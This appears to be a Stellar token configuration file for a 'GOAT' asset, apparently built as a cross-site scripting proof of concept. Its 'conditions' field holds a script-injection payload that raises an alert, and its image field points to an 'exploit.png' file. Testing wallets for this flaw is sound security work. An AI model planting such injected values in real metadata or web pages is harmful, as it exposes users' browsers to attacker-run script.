VERSION="2.0.0"


[[CURRENCIES]]
code="GOAT"
issuer="GD5T6IPRNCKFOHQWT264YPKOZAWUMMZOLZBJ6BNQMUGPWGRLBK3U7ZNP"
display_decimals=2
name="goat share"
desc="1 GOAT token entitles you to a share of revenue from Elkins Goat Farm."
conditions="<script>alert('XSS with asset conditions')"
image="vinamogit.github.io/exploit.png"
fixed_number=10000
